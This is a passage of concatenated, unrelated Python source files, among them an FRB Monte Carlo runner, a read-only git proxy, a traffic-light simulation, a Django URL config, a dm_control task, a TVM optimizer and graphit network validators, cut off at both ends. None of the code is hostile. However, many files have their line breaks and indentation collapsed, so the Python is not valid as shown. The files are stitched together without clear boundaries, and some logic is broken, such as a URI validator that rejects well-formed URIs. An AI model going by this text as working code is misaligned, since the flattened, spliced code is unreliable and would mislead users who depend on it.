1), minor=True) ax.set_yticks(np.arange(-0.5, nmodels - 0.5, 1), minor=True) plt.grid(which='minor', lw=0.5, c='k') plt.xticks([-1., -0.5, 0., 0.5, 1.], ['100\%', '50\%', '0\%', '50\%', '100\%'], fontsize=28) fig.subplots_adjust(hspace=0.05, wspace=0) plt.show() macrocosme/frbpoppy """Link together all classes to run a full Monte Carlo.""" import pandas as pd import numpy as np import frbpoppy.paths import os from simulations import MonteCarlo, POP_SIZE from goodness_of_fit import GoodnessOfFit from plot import Plot GENERATE = True CALC_GOFS = True RUNS = [10] class RunOverview: """Gather input for each run.""" def __init__(self, load_csv=True): p = frbpoppy.paths.populations() self.filename = f'{p}mc/run_overview.csv' if load_csv and os.path.isfile(self.filename): self.df = self.load() else: self.df = self.gen_runs() def gen_run(self): return {'alpha': None, 'si': None, 'li': None, 'lum_min': None, 'lum_max': None, 'w_mean': None, 'w_std': None, 'dm_igm_slope': None, 'dm_host': None, 'execute': True, 'par_set': 0, 'run': 0} def gen_runs(self): runs = [] for i in range(10): r = self.gen_run() r['run_number'] = i + 1 r['execute'] = True r['par_set'] = i % 4 + 1 if i == 9: # Holder for best values r['execute'] = False runs.append(r) df = pd.DataFrame(runs) df.set_index('run', inplace=True) return df def load(self): df = pd.read_csv(self.filename) df.run = df.run.astype(int) df.par_set = df.par_set.astype(int) df = df.loc[:, ~df.columns.str.contains('^Unnamed')] return df def save(self, df=None): if df is None: df = self.df df.to_csv(self.filename) if __name__ == '__main__': print('Commencing') runs = RunOverview(load_csv=True) mc = MonteCarlo(pop_size=POP_SIZE) for i, run in runs.df.iterrows(): run = runs.df.iloc[i] print('='*50) print(f'On Run {run.run} with par_set {run.par_set}') print('='*50) print(run) if run.run not in RUNS: continue # Generate parameter sets if GENERATE: if run.par_set == 1: mc.gen_par_set_1(lum_min=run.lum_min, lum_max=run.lum_max, w_mean=run.w_mean, w_std=run.w_std, dm_igm_slope=run.dm_igm_slope, dm_host=run.dm_host, run=run.run) if run.par_set == 2: mc.gen_par_set_2(alpha=run.alpha, si=run.si, w_mean=run.w_mean, w_std=run.w_std, dm_igm_slope=run.dm_igm_slope, dm_host=run.dm_host, run=run.run) if run.par_set == 3: mc.gen_par_set_3(alpha=run.alpha, si=run.si, li=run.li, lum_min=run.lum_min, lum_max=run.lum_max, dm_igm_slope=run.dm_igm_slope, dm_host=run.dm_host, run=run.run) if run.par_set == 4: mc.gen_par_set_4(alpha=run.alpha, si=run.si, li=run.li, lum_min=run.lum_min, lum_max=run.lum_max, w_mean=run.w_mean, w_std=run.w_std, run=run.run) # Determine the goodness of fit gf = GoodnessOfFit() if CALC_GOFS: gf.calc_gofs(run.run) # Find global maximums gf = GoodnessOfFit() gms = gf.calc_global_max(run.run) print('\n') print(f' Best fits from run {run.run}-> {gms}') print('\n') # Adapt the input for future runs for j in range(i+1, len(runs.df)): for par in gms: runs.df.at[j, par] = gms[par][0] runs.save() Plot() #!/usr/bin/env python3 # Copyright 2020 # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import subprocess import sys import os import proxyenvironment def debug(line): with open('/home/git/proxy.log', 'a+') as f: f.write(line + "\n") def exec(command, check): try: result = subprocess.run(command, check=True) except subprocess.CalledProcessError as e: debug(str(e)) if check: raise e def update_cache(repository, dest_path): debug("Updating cache for %s" % repository) if not os.path.exists(dest_path): repository_parts = repository.split(os.sep)[1:] # 1: because the first is empty remote = "ssh://%s@%s:%s%s" % (proxyenvironment.UPSTREAM_USER, proxyenvironment.UPSTREAM_HOST, proxyenvironment.UPSTREAM_PORT, repository) os.makedirs(dest_path) command = ['git', 'clone', '--mirror', remote, dest_path] debug("Cloning repository with %s" % command) exec(command, True) prereceive_path = "%s/hooks/pre-receive" % dest_path debug("Installing write-blocking hook to %s" % prereceive_path) with open(prereceive_path, 'w+') as f: f.writelines(['#!/bin/bash\n', 'echo "You cannot push to the git-wfh proxy"\n', 'exit 1\n']) exec(['chmod', 'ugo+rx', prereceive_path], True) # TODO: Install hooks to prevent pushes else: os.chdir(dest_path) command = ['git', 'fetch', '--prune'] debug("Updating cache with %s" % command) exec(command, False) debug("Proxy called with:") debug(" ".join(sys.argv)) # Remove the first argument (script name) shell_args = sys.argv[1:] # The final argument is the git-shell command and (in quotes) repository repository = shell_args[-1].split()[-1][1:-1] if repository[0] != os.sep: # This happens if it's a ~path repository = os.sep + repository dest_path = '/repositories' + repository update_cache(repository, dest_path) # Now mangle the final part to map it to our cache path final_parts = shell_args[-1].split() final_parts[-1] = "'%s'" % dest_path shell_args[-1] = " ".join(final_parts) command = ['/usr/bin/git-shell'] + shell_args debug("Passing command upstream with %s" % command) exec(command, True)import os def rename_files(): file_list = os.listdir('/Users/cidmedeiros1/Pictures/Piri_Trip') print(file_list) saved_path = os.getcwd() print("Working dir is " + saved_path) os.chdir('/Users/cidmedeiros1/Pictures/Piri_Trip') var0 = '.JPG' var1 = 1 var2 = 'Piri_Trip' for file_name in file_list: print('Old Name was '+file_name) var1 = str(var1) new_file_name = var2+var1+var0 os.rename(file_name,new_file_name) print('New Name is '+new_file_name) var1 = int(var1) var1 = var1+1 rename_files() 1-10 import random import numpy as np from keras.models import Model, Sequential from keras.layers import Dense import pandas as pd import itertools def move(current, previous, wt, wte): if current == previous: count = 2 else: count = 1 wt += len(queues[0]) + len(queues[1]) + len(queues[2]) + len(queues[3]) wte += queues[0].count('e') + queues[1].count('e') 
+ queues[2].count('e') + queues[3].count('e') with open('MLtest.txt', 'a') as f: if current: q0 = min(count, len(queues[0])) q1 = min(count, len(queues[1])) q2 = 0 q3 = 0 f.write(f'{queues[0]} {q0} {queues[1]} {q1} {queues[2]} {q2} {queues[3]} {q3} {current} \n') del queues[0][0:q0] del queues[1][0:q1] return wt, wte else: q0 = 0 q1 = 0 q2 = min(count, len(queues[2])) q3 = min(count, len(queues[3])) f.write(f'{queues[0]} {q0} {queues[1]} {q1} {queues[2]} {q2} {queues[3]} {q3} {current} \n') del queues[2][0:q2] del queues[3][0:q3] return wt, wte def algorithm(c): if 'e' in queues[0] or 'e' in queues[1]: return True if 'e' in queues[2] or 'e' in queues[3]: return False if c: tpc = min(2, len(queues[0])) + min(2, len(queues[1])) tpa = min(1, len(queues[2])) + min(1, len(queues[3])) else: tpa = min(2, len(queues[0])) + min(2, len(queues[1])) tpc = min(1, len(queues[2])) + min(1, len(queues[3])) if tpa > tpc: return not c else: return c def train(queues, c, e0, e1): if e0: return True if e1: return False if c: tpc = min(2, queues[0]) + min(2, queues[1]) tpa = min(1, queues[2]) + min(1, queues[3]) else: tpa = min(2, queues[0]) + min(2, queues[1]) tpc = min(1, queues[2]) + min(1, queues[3]) if tpa > tpc: return not c else: return c def timer(c, t): t += 1 if t == 60: c = not c return c, t elif t == 80: t = 0 c = not c return c, t else: return c, t def add_cars(q, num_emergency): n = random.choice(qp[q]) re = [] for _ in range(n): c = np.random.choice(['n', 'e'], p = [299/300, 1/300]) if c == 'e': num_emergency += 1 re.append(c) return re, num_emergency M = 'ML' if M == 'ML': r = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] c = [False, True] e0 = [False, True] e1 = [False, True] product = list(itertools.product(r, r, r, r, c, e0, e1)) res = [] for p in product: res.append(train(p[:4], p[4], p[5], p[6])) df = pd.DataFrame() df['Q1'] = [k[0] for k in product] df['Q2'] = [k[1] for k in product] df['Q3'] = [k[2] for k in product] df['Q4'] = [k[3] for k in product] df['C'] = [k[4] for k in product] df['e0'] = [k[5] for k in product] df['e1'] = [k[6] for k in product] df['R'] = res X = df[['Q1','Q2','Q3','Q4','C', 'e0', 'e1']] y = df['R'] model = Sequential() model.add(Dense(6, input_dim=7, activation='relu')) model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(X, y, epochs=50) _, accuracy = model.evaluate(X, y) print('Accuracy: %.2f' % (accuracy*100)) qp = [[0] * 9 + [1], [0] * 9 + [1], [0] * 19 + [1], [0] * 19 + [1]] l = [] le = [] ta = 0 for __ in range(100): current = True previous = True wt = 0 wte = 0 t = 0 num_cars = 0 num_emergency = 0 queues = [[], [], [], []] for _ in range(3600): previous = current for x in range(4): n, num_emergency = add_cars(x, num_emergency) num_cars += len(n) queues[x] += n if M == 'timer': current, t = timer(current, t) elif M == 'algorithm': current = algorithm(current) else: if 'e' in queues[0] or 'e' in queues[1]: e0 = True else: e0 = False if 'e' in queues[2] or 'e' in queues[3]: e1 = True else: e1 = False X = pd.DataFrame([{'Q1':len(queues[0]), 'Q2':len(queues[1]), 'Q3':len(queues[2]), 'Q4':len(queues[3]), 'C':current, 'e0':e0, 'e1':e1}]) current = model.predict(X)[0][0] if current >= 0.5: current = True else: current = False wt, wte = move(current, previous, wt, wte) l.append(wt/num_cars) if num_emergency: le.append(wte/num_emergency) print(f'{M}: {np.mean(l)}') print(f'Emergency {M}: {np.mean(le)}') # -*- coding: utf-8 -*- import argparse from phys2bids import __version__ def _get_parser(): 
""" Parses command line inputs for this function Returns ------- parser.parse_args() : argparse dict """ parser = argparse.ArgumentParser() # Argument parser follow template provided by RalphyZ. # https://stackoverflow.com/a/43456577 optional = parser._action_groups.pop() required = parser.add_argument_group('Required Argument:') required.add_argument('-in', '--input-file', dest='filename', type=str, help=('The name of the acq file, with or without ' 'extension. Must be an .acq file!'), required=True) optional.add_argument('-info', '--info', dest='info', action='store_true', help='Only output file info, don\'t process.', default=False) optional.add_argument('-indir', '--input-dir', dest='indir', type=str, help='Folder containing input.', default='.') optional.add_argument('-outdir', '--output-dir', dest='outdir', type=str, help=('Folder where output should be placed.' 'If \"-heur\" is used, it\'ll become ' 'the site folder. Requires \"-sub\",' ' and it\'s possible to specify \"-ses\""'), default='.') optional.add_argument('-heur', '--heuristic', dest='heur_file', type=str, help=('File containing heuristic, with or without ' 'extension. Specify path to it if necessary.'), default=None) # optional.add_argument('-hdir', '--heur-dir', # dest='heurdir', # type=str, # help='Folder containing heuristic file.', # default='.') optional.add_argument('-sub', '--subject', dest='sub', type=str, help=('To be specified with \"-heur\". Code of ' 'subject to process.' 'Specify path to it if necessary.'), default=None) optional.add_argument('-ses', '--session', dest='ses', type=str, help=('To be specified with \"-heur\". Code of ' 'session to process.' 'Specify path to it if necessary.'), default=None) optional.add_argument('-chtrig', '--channel-trigger', dest='chtrig', type=int, help=('The number corresponding to the trigger channel.' ' Channel numbering starts with 0'), default=1) optional.add_argument('-chsel', '--channel-selection', dest='chsel', nargs='*', type=int, help='The number corresponding to the channels to process.', default=None) optional.add_argument('-ntp', '--numtps', dest='num_tps_expected', type=int, help='Number of expected timepoints.', default=0) optional.add_argument('-tr', '--tr', dest='tr', type=float, help='TR of sequence in seconds.', default=1) optional.add_argument('-thr', '--threshold', dest='thr', type=float, help='Threshold used for trigger detection.', default=2.5) optional.add_argument('-tbhd', '--table-header', dest='table_header', nargs='*', type=str, help='Columns header (for json file).', # #!# Has to go to empty list default=['time', 'respiratory_chest', 'trigger', 'cardiac', 'respiratory_CO2', 'respiratory_O2']) optional.add_argument('-v', '--version', action='version', version=('%(prog)s ' + __version__)) parser._action_groups.append(optional) return parser if __name__ == '__main__': raise RuntimeError('phys2bids/cli/run.py should not be run directly;\n' 'Please `pip install` phys2bids and use the ' '`phys2bids` command') hhyluor/Code_Repository- from django.urls import re_path from . 
import views

urlpatterns = [
    re_path(r'^usernames/(?P<username>[a-zA-Z0-9_-]{5,20})/count/$', views.UsernameCountView.as_view()),
    re_path(r'^mobiles/(?P<mobile>1[3-9]\d{9})/count/$', views.MobileCountView.as_view()),
    re_path(r'^register/$', views.RegisterView.as_view()),
    re_path(r'^login/$', views.LoginView.as_view()),
    re_path(r'^logout/$', views.LogoutView.as_view()),
    re_path(r'^info/$', views.UserInfoView.as_view()),
    re_path(r'^emails/$', views.EmailView.as_view()),
    re_path(r'^emails/verification/$', views.VerifyEmailView.as_view()),
    re_path(r'^addresses/create/$', views.CreateAddressView.as_view()),
    re_path(r'^addresses/$', views.AddressView.as_view()),
    re_path(r'^addresses/(?P<address_id>\d+)/$', views.UpdateDestroyAddressView.as_view()),
    re_path(r'^addresses/(?P<address_id>\d+)/default/$', views.ChangeDefaultAddressView.as_view()),
    re_path(r'^addresses/(?P<address_id>\d+)/title/$', views.UpdateTitleAddressView.as_view()),
    re_path(r'^password/$', views.ChangePasswordView.as_view()),
    re_path(r'^browse_histories/$', views.SaveHistoryView.as_view()),
]

from catvae.models.linear_cat_vae import LinearCatVAE
from catvae.models.linear_cat_vae import LinearBatchCatVAE
from catvae.models.linear_vae import LinearVAE
from catvae.models.linear_vae import LinearDLRVAE
from catvae.models.linear_vae import LinearBatchVAE
from catvae.models.batch_classifier import Q2BatchClassifier

__all__ = ['LinearCatVAE', 'LinearBatchCatVAE', 'LinearVAE', 'LinearDLRVAE',
           'LinearBatchVAE', 'Q2BatchClassifier']

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pyautocad import Autocad, APoint

acad = Autocad()
acad.prompt("Hello, Autocad from Python\n")
print(acad.doc.Name)

p1 = APoint(0, 0)
p2 = APoint(50, 25)
for i in range(5):
    text = acad.model.AddText('Hi %s!' % i, p1, 2.5)
    acad.model.AddLine(p1, p2)
    acad.model.AddCircle(p1, 10)
    p1.y += 10

dp = APoint(10, 0)
for text in acad.iter_objects('Text'):
    print('text: %s at: %s' % (text.TextString, text.InsertionPoint))
    text.InsertionPoint = APoint(text.InsertionPoint) + dp

for obj in acad.iter_objects(['Circle', 'Line']):
    print(obj.ObjectName)

# Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================ """Point-mass domain.""" import collections from dm_control import mujoco from dm_control.rl import control from dm_control.suite import base from dm_control.suite import common from dm_control.suite.utils import randomizers from dm_control.utils import containers from dm_control.utils import rewards import numpy as np _DEFAULT_TIME_LIMIT = 20 SUITE = containers.TaggedTasks() def get_model_and_assets(): """Returns a tuple containing the model XML string and a dict of assets.""" return common.read_model('point_mass.xml'), common.ASSETS @SUITE.add('benchmarking', 'easy') def easy(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the easy point_mass task.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=False, random=random) environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) @SUITE.add() def hard(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the hard point_mass task.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=True, random=random) environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) @SUITE.add() def go_horizontal(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the easy point_mass task, with target x = 0.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=False, random=random, move_dir='horizontal') environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) @SUITE.add() def go_vertical(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the easy point_mass task, with target y = 0.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=False, random=random, move_dir='vertical') environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) class Physics(mujoco.Physics): """physics for the point_mass domain.""" def mass_to_target(self): """Returns the vector from mass to target in global coordinate.""" return (self.named.data.geom_xpos['target'] - self.named.data.geom_xpos['pointmass']) def mass_to_target_x(self): """Returns the distance from mass to x = 0 target.""" return np.linalg.norm((self.named.data.geom_xpos['target'][0] - self.named.data.geom_xpos['pointmass'][0])) def mass_to_target_y(self): """Returns the distance from mass to y = 0 target.""" return np.linalg.norm((self.named.data.geom_xpos['target'][1] - self.named.data.geom_xpos['pointmass'][1])) def mass_to_target_dist(self): """Returns the distance from mass to the target.""" return np.linalg.norm(self.mass_to_target()) class PointMass(base.Task): """A point_mass `Task` to reach target with smooth reward.""" def __init__(self, randomize_gains, random=None, move_dir=None): """Initialize an instance of `PointMass`. Args: randomize_gains: A `bool`, whether to randomize the actuator gains. random: Optional, either a `numpy.random.RandomState` instance, an integer seed for creating a new `RandomState`, or None to select a seed automatically (default). move_direction: Optional, if the target is x = 0 or y = 0. Default target is (x,y) = (0,0). 
""" self._randomize_gains = randomize_gains super().__init__(random = random) self._move_dir = move_dir def initialize_episode(self, physics): """Sets the state of the environment at the start of each episode. If _randomize_gains is True, the relationship between the controls and the joints is randomized, so that each control actuates a random linear combination of joints. Args: physics: An instance of `mujoco.Physics`. """ randomizers.randomize_limited_and_rotational_joints(physics, self.random) if self._randomize_gains: dir1 = self.random.randn(2) dir1 /= np.linalg.norm(dir1) # Find another actuation direction that is not 'too parallel' to dir1. parallel = True while parallel: dir2 = self.random.randn(2) dir2 /= np.linalg.norm(dir2) parallel = abs(np.dot(dir1, dir2)) > 0.9 physics.model.wrap_prm[[0, 1]] = dir1 physics.model.wrap_prm[[2, 3]] = dir2 super().initialize_episode(physics) def get_observation(self, physics): """Returns an observation of the state.""" obs = collections.OrderedDict() obs['position'] = physics.position() obs['velocity'] = physics.velocity() return obs def get_reward(self, physics): """Returns a reward to the agent.""" target_size = physics.named.model.geom_size['target', 0] near_target = rewards.tolerance(physics.mass_to_target_dist(), bounds=(0, target_size), margin=target_size) if self._move_dir == 'horizontal': near_target = rewards.tolerance(physics.mass_to_target_x(), bounds=(0, target_size), margin=target_size) elif self._move_dir == 'vertical': near_target = rewards.tolerance(physics.mass_to_target_y(), bounds=(0, target_size), margin=target_size) control_reward = rewards.tolerance(physics.control(), margin=1, value_at_margin=0, sigmoid='quadratic').mean() small_control = (control_reward + 4) / 5 return near_target * small_control lim/__init__.py0 # -*- coding: utf-8 -*- import datetime import os import pathlib import pbr.version import textwrap # PBR has a bug that produces incorrect version numbers # if you run ``psec --version`` in another Git repo. # This attempted workaround only uses PBR for getting # version and revision number if run in a directory # path that contains strings that appear to be # a python_secrets repo clone. p = pathlib.Path(os.getcwd()) if 'lim-cli' in p.parts or 'lim' in p.parts: try: version_info = pbr.version.VersionInfo('lim') __version__ = version_info.cached_version_string() __release__ = version_info.release_string() except Exception: pass else: __version__ = '20.6.3' __release__ = __version__ BUFFER_SIZE = 128 * 1024 DAY = os.environ.get('DAY', 5) DEFAULT_PROTOCOLS = ['icmp', 'tcp', 'udp'] KEEPALIVE = 5.0 LIM_DATA_DIR = os.environ.get('LIM_DATA_DIR', os.getcwd()) MAX_LINES = None MAX_ITEMS = 10 # Use syslog for logging? # TODO(dittrich): Make this configurable, since it can fail on Mac OS X SYSLOG = False __author__ = '' __email__ = '' def copyright(): """Copyright string""" this_year = datetime.datetime.today().year copyright = textwrap.dedent( f"""Author: <> Copyright: 2018-{ this_year }, . 2019-{ this_year }, Liminal Information Corp. 
License: Apache 2.0 License URL: https://pypi.python.org/pypi/lim-cli""") # noqa return copyright # vim: set ts=4 sw=4 tw=0 et : import os import uuid from typing import Tuple, Dict import onnx import torch.cuda from nebullvm.base import ModelParams, DeepLearningFramework from nebullvm.config import ( AUTO_TVM_TUNING_OPTION, AUTO_TVM_PARAMS, NO_COMPILER_INSTALLATION, ) from nebullvm.inference_learners.tvm import ( TVM_INFERENCE_LEARNERS, ApacheTVMInferenceLearner, ) from nebullvm.optimizers.base import BaseOptimizer, get_input_names try: import tvm from tvm import IRModule from tvm.runtime.ndarray import NDArray from tvm.autotvm.tuner import XGBTuner from tvm import autotvm import tvm.relay as relay except ImportError: import warnings if not NO_COMPILER_INSTALLATION: warnings.warn( "Not found any valid tvm installation. " "Trying to install it from source." ) from nebullvm.installers.installers import install_tvm install_tvm() import tvm from tvm import IRModule from tvm.runtime.ndarray import NDArray from tvm.autotvm.tuner import XGBTuner from tvm import autotvm import tvm.relay as relay else: warnings.warn("Not found any valid tvm installation") # TVM objects needed for avoiding errors IRModule = object NDArray = object class ApacheTVMOptimizer(BaseOptimizer): """Class for compiling the AI models on Nvidia GPUs using TensorRT.""" def optimize( self, onnx_model: str, output_library: DeepLearningFramework, model_params: ModelParams, ) -> ApacheTVMInferenceLearner: """Optimize the input model with Apache TVM. Args: onnx_model (str): Path to the saved onnx model. output_library (str): DL Framework the optimized model will be compatible with. model_params (ModelParams): Model parameters. Returns: ApacheTVMInferenceLearner: Model optimized with TVM. The model will have an interface in the DL library specified in `output_library`. 
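        Example (illustrative sketch added for clarity; it assumes a saved
        ONNX file at a placeholder path, a populated `ModelParams` instance,
        and that `DeepLearningFramework` exposes a `PYTORCH` member):

            optimizer = ApacheTVMOptimizer()
            learner = optimizer.optimize(
                onnx_model="/path/to/model.onnx",
                output_library=DeepLearningFramework.PYTORCH,
                model_params=model_params,
            )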
""" target = self._get_target() mod, params = self._build_tvm_model(onnx_model, model_params) tuning_records = self._tune_tvm_model(target, mod, params) with autotvm.apply_history_best(tuning_records): with tvm.transform.PassContext(opt_level=3, config={}): lib = relay.build(mod, target=target, params=params) model = TVM_INFERENCE_LEARNERS[output_library].from_runtime_module( network_parameters=model_params, lib=lib, target_device=target, input_names=get_input_names(onnx_model), ) return model @staticmethod def _build_tvm_model( onnx_model_path: str, model_params: ModelParams ) -> Tuple[IRModule, Dict[str, NDArray]]: shape_dict = { input_key: ( model_params.batch_size, *input_size, ) for input_key, input_size in zip( get_input_names(onnx_model_path), model_params.input_sizes ) } onnx_model = onnx.load(onnx_model_path) mod, params = relay.frontend.from_onnx(onnx_model, shape_dict) return mod, params @staticmethod def _get_target() -> str: force_on_cpu = int(os.getenv("TVM_ON_CPU", 0)) > 1 if not force_on_cpu and torch.cuda.is_available(): return str(tvm.target.cuda()) else: return "llvm" # run on CPU @staticmethod def _tune_tvm_model( target: str, mod: IRModule, params: Dict[str, NDArray] ) -> str: """Tune the model using AutoTVM.""" # TODO: add support to Ansor tuning_records = f"{uuid.uuid4()}_model_records.json" # create a TVM runner runner = autotvm.LocalRunner( number=AUTO_TVM_PARAMS["number"], repeat=AUTO_TVM_PARAMS["repeat"], timeout=AUTO_TVM_PARAMS["timeout"], min_repeat_ms=AUTO_TVM_PARAMS["min_repeat_ms"], # TODO modify min_repeat_ms for GPU usage enable_cpu_cache_flush=True, ) # begin by extracting the tasks from the onnx model tasks = autotvm.task.extract_from_program( mod["main"], target=target, params=params ) # Tune the extracted tasks sequentially. for i, task in enumerate(tasks): tuner_obj = XGBTuner(task, loss_type="rank") tuner_obj.tune( n_trial=min( AUTO_TVM_TUNING_OPTION["trials"], len(task.config_space) ), early_stopping=AUTO_TVM_TUNING_OPTION["early_stopping"], measure_option=autotvm.measure_option( builder=autotvm.LocalBuilder(build_func="default"), runner=runner, ), callbacks=[ autotvm.callback.log_to_file(tuning_records), ], ) return tuning_records # -*- coding: utf-8 -*- """ file: model_networking.py Graph model classes for dealing with network communication """ import re import logging import ipaddress import uritools import socket from graphit import __module__ from graphit.graph_py2to3 import to_unicode, PY_STRING from graphit.graph_mixin import NodeEdgeToolsBaseClass __all__ = ['IP4Address', 'IP6Address'] logger = logging.getLogger(__module__) HOSTNAME_REGEX = re.compile( r'^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|' r'([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|' r'([a-zA-Z0-9][-_.a-zA-Z0-9]{0,61}[a-zA-Z0-9]))\.' 
r'([a-zA-Z]{2,13}|[a-zA-Z0-9-]{2,30}.[a-zA-Z]{2,3})$' ) class IP4Address(NodeEdgeToolsBaseClass): def set(self, key, value=None): """ Validate and set IP4 address according to the "dotted-quad" ABNF syntax as defined in RFC 2673 """ if key == self.data.key_tag: try: ip = ipaddress.ip_address(to_unicode(value)) if ip.version != 4: logger.error('{0} is of IP protocol {1} not 4'.format(value, ip.version)) except ipaddress.AddressValueError: logger.error('{0} not a valid IP4 address'.format(value)) self.nodes[self.nid][key] = value class IP6Address(NodeEdgeToolsBaseClass): def set(self, key, value=None): """ Validate and set IP6 address according to RFC 4291 """ if key == self.data.key_tag: try: ip = ipaddress.ip_address(to_unicode(value)) if ip.version != 6: logger.error('{0} is of IP protocol {1} not 6'.format(value, ip.version)) except ipaddress.AddressValueError: logger.error('{0} not a valid IP6 address'.format(value)) self.nodes[self.nid][key] = value class Hostname(NodeEdgeToolsBaseClass): @staticmethod def hostname(): """ Get hostname of current machine """ return socket.gethostname() def set(self, key=None, value=None): """ Validate and set a hostname according to RFC 1034 with idn support in as in RFC 5890. Set to current hostname if called without arguments. * Should be string * Maximum length of DNS name is 253 characters * Validate against hostname regex """ key = key or self.data.value_tag if key == self.data.value_tag: if not value: value = self.hostname() if not isinstance(value, PY_STRING) or len(value) > 253 or not HOSTNAME_REGEX.match(value): logger.error('Not a valid hostname: {0}'.format(value)) return self.nodes[self.nid][key] = value class URI(NodeEdgeToolsBaseClass): """ Methods for working with Universal Resource Identifiers (URIs) in accordance to RFC 3986 with support for unicode. 
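    Illustrative note (added for clarity): the properties below simply
    delegate to `uritools.urisplit`. For 'https://example.org:8080/api?q=1#top'
    they return scheme 'https', authority 'example.org:8080', path '/api',
    query 'q=1' and fragment 'top'.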
""" @property def scheme(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.scheme @property def authority(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.authority @property def port(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.port @property def path(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.path @property def query(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.query @property def fragment(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.fragment @staticmethod def compose(scheme=None, authority=None, path=None, query=None, fragment=None, port=None): parts = uritools.uricompose(scheme=scheme, host=authority, port=port, path=path, query=query, fragment=fragment) return uritools.uriunsplit(parts) def set(self, key, value, **kwarg): """ Validate and set RFC 3986 compliant, Unicode-aware, scheme-agnostic URIs """ if key == self.data.value_tag: if isinstance(value, PY_STRING): parsed = uritools.urisplit(value) if parsed.scheme and parsed.authority and parsed.path: logger.error('No valid URI: {0}'.format(value)) return self.nodes[self.nid][key] = value from hashlib import md5 from sentry.utils.cache import cache def cache_this(timeout=60): def decorator(func): def wrapper(*args, **kwargs): def get_cache_key(*args, **kwargs): params = list(args) + kwargs.values() return md5("".join(map(str, params))).hexdigest() key = get_cache_key(func.__name__, *args, **kwargs) result = cache.get(key) if not result: result = func(*args, **kwargs) cache.set(key, result, timeout) return result return wrapper return decorator def get_int(value, default=0): try: return int(value) except ValueError: return default Bitkeen/amcc #!/usr/bin/env python from amcc_ui import Ui from blessed import Terminal from configparser import ConfigParser from word_parser import WordParser if __name__ == '__main__': config = ConfigParser() config.read('amcc.conf') # Select the 'main' section from the config file. 
parser_config = config['main'] ui_config = config['ui'] term = Terminal() with term.fullscreen(): ui = Ui(ui_config, term) parser = WordParser(parser_config, ui) parser.start() tests/test_discretisation/test_equal_frequency_discretiser.py import pandas as pd import pytest from sklearn.exceptions import NotFittedError from feature_engine.discretisation import EqualFrequencyDiscretiser def test_automatically_find_variables_and_return_as_numeric(df_normal_dist): # test case 1: automatically select variables, return_object=False transformer = EqualFrequencyDiscretiser(q=10, variables=None, return_object=False) X = transformer.fit_transform(df_normal_dist) # output expected for fit attr _, bins = pd.qcut(x=df_normal_dist["var"], q=10, retbins=True, duplicates="drop") bins[0] = float("-inf") bins[len(bins) - 1] = float("inf") # expected transform output X_t = [x for x in range(0, 10)] # test init params assert transformer.q == 10 assert transformer.variables == ["var"] assert transformer.return_object is False # test fit attr assert transformer.input_shape_ == (100, 1) # test transform output assert (transformer.binner_dict_["var"] == bins).all() assert all(x for x in X["var"].unique() if x not in X_t) # in equal frequency discretisation, all intervals get same proportion of values assert len((X["var"].value_counts()).unique()) == 1 def test_automatically_find_variables_and_return_as_object(df_normal_dist): # test case 2: return variables cast as object transformer = EqualFrequencyDiscretiser(q=10, variables=None, return_object=True) X = transformer.fit_transform(df_normal_dist) assert X["var"].dtypes == "O" def test_error_when_q_not_number(): with pytest.raises(ValueError): EqualFrequencyDiscretiser(q="other") def 